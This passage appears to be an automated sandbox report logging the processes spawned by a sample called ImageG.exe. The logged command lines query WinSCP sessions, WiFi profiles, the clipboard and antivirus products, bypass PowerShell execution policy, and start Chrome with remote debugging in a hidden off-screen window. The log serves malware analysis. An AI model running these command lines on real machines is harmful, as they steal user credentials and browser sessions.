        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6798C408-2636-448C-8AC6-F4E341102D27}""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6798C408-2636-448C-8AC6-F4E341102D27}"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7B981965-2FBC-433C-B4B3-E183EE97CD29}""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7B981965-2FBC-433C-B4B3-E183EE97CD29}"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B652B695-C849-4EF2-B09A-72771C7AD2BA}""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B652B695-C849-4EF2-B09A-72771C7AD2BA}"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "mullvad account get"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FO CSV /NH"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Format-List displayName, instanceGuid, pathToSignedProductExe, pathToSignedReportingExe, productState, timestamp""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO CSV /NH
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\RpfMwk5hAFqJ_tezmp.ps1""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Format-List displayName, instanceGuid, pathToSignedProductExe, pathToSignedReportingExe, productState, timestamp"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\RpfMwk5hAFqJ_tezmp.ps1"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /PID 9048 /F
        Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --window-position=-2400,-2400
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2232,i,12830479303068342978,11409588197743530798,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2248 /prefetch:3
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\reg.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\ImageG.exeProcess created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "chcp"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=7896 get ExecutablePath"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe "C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\desenamoreis" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1696 --field-trial-handle=1704,i,16015974932036603911,12011319821735698167,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "NET SESSION"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\error_script.ps1""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe "C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\desenamoreis" --mojo-platform-channel-handle=2424 --field-trial-handle=1704,i,16015974932036603911,12011319821735698167,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 91.0.1 (x64 en-GB)""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""Jump to behavior
